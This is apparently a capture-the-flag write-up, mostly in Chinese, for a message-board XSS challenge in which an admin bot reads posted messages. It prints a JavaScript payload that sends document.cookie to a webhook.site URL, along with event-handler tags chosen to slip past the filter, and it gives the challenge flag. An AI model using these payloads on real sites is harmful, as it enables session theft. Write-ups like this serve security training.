# 12005-Message Board > http://ctf.adl.tw:12005/ ## Briefing 留言板，送出訊息後快速重新整理會發現該訊息有 css class `.unread`，過一段時間刷新又會變成 `.read`，但沒有任何視覺效果，很 sad。但表示後面可能有個小精靈在看我們給的訊息。 ## Exploit Response header 寫了好長的 CSP(Content-Header Policy)，意圖讓我們 XSS 偷小精靈的餅乾！  我們到 [XSS 庫](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)找有沒有能用的字段  經過多次測試，發現系統會擋一些 tag (e.g. `<audio>`, `<svg>`)、會擋一些字段 (e.g. `onload`)、會濾掉一些字元/tag (e.g. `+`, `<body>`)  依照條件，組合出以下 payload ### XSS payload #### bad bad javascript 操縱使用者帶著餅乾到我們要的地方 ```js window.location=["https://webhook.site/704dac4c-ade3-47f3-b0b5-38ef08b06bbf?flag=",document.cookie].join() ``` #### bad bad html tag **請自行替換 `alert(1)` 為上面的壞壞 JS* ```htmlembedded <details ontoggle=alert(1) open>test</details> ``` works on my machine (Chrome), untested for flag ```htmlmixed <iframe src='javascript:alert(1)'></iframe> <link rel=stylesheet href=87 onerror=alert(1)> ``` ### Result 理論上使用者 (包含我們自己) 一旦看到這訊息，無須任何操作，就會被引導到我們指定的地點。 我們自己  admin AKA　遠端 server  > Flag: `ADL{r3F15C7!0N_X5S_@77@Ck}` > ~~怎麼沒有 yt 連結~~